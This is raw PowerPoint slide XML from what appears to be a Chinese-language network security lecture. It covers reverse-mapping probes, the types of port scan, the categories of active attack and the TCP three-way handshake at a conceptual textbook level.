  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>探测被过滤设备或防火墙保护的网络（内部结构）和主机。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通常这些系统无法从外部直接到达。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造可能的内部</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址列表，并向这些地址发送数据包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对方路由器反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP Host Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP Time Exceeded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：不理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有接收到相应错误报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反向映射探测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7B5189E8-F324-4ECE-9E62-8F3F3E8DA421}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3670030080"/>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端口扫描</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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口是通信通道，也是潜在的入侵通道。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过端口扫描确定主机开放的端口，不同的端口对应运行着的不同的网络服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>思想：向指定端口发送消息，观察有无应答及应答类型，判断端口是否开放及服务情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="内容占位符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074573"/>
            <a:ext cx="8076059" cy="4342168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="633760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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>篡改数据流、或产生虚假流。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常分为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假冒：一个实体假装为另一个实体。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>重放：被动获取一个数据单元，然后重传，以产生一个未授权的效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>篡改：一个合法消息的某些部分被改变，或延迟或改变顺序，以产生一个未授权的效果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务：防止或禁止通信设施的正常使用或管理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特点：能够检测出来，不易有效防止。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预防措施：自动审计、入侵检测和完整性恢复。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>受害者易感知</a:t>
            </a:r>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18DD4A24-DA2B-4273-88AC-F1E54A22E79C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2552882622"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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内容占位符 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1179306"/>
          <a:ext cx="8229600" cy="5214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2098" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的过程</a:t>
            </a:r>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13209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EEDA8CF-EC48-4EEA-8510-0BBA14C99224}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189588918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nchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>黑客攻击策略步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="296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16632"/>
            <a:ext cx="8043862" cy="674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14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29674244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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要包括以下三类：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开放扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>半开放扫描（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐蔽扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描、分段扫描）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大部分基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的握手与挥手</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口扫描类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C7A34942-AE82-4338-9DE7-02A83A922E90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376988697"/>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2"/>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FA82A7B2-6545-45EA-ABA1-7D4C2F18343E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三次握手机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5561013" y="2826098"/>
            <a:ext cx="27289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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SYN received</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226308" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887788" y="2138710"/>
            <a:ext cx="0" cy="3343275"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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226309" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="2138710"/>
            <a:ext cx="0" cy="3343275"/>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48136" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2273300" y="1268760"/>
            <a:ext cx="771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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48137"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7263" y="1552923"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6473825" y="1268760"/>
            <a:ext cx="771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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：服务端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48139" name="Picture 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7788" y="1552923"/>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14" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="987425" y="2340323"/>
            <a:ext cx="2486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zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分段 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2138"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=SYN)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226315" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3902075" y="2810223"/>
            <a:ext cx="1543050" cy="257175"/>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2" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="2386360"/>
            <a:ext cx="415925" cy="455613"/>
            <a:chOff x="293" y="1677"/>
            <a:chExt cx="262" cy="287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226317" name="Oval 13"/>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57" name="Rectangle 14"/>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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2012950" y="3021360"/>
            <a:ext cx="6932613" cy="911225"/>
            <a:chOff x="1393" y="1920"/>
            <a:chExt cx="4367" cy="574"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226320" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2556" y="2220"/>
              <a:ext cx="990" cy="144"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800">
              <a:solidFill>
                <a:srgbClr val="00B179"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48151" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3637" y="2122"/>
              <a:ext cx="21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zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>发送</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>TCP SYN&amp;ACK</a:t>
              </a:r>
              <a:r>
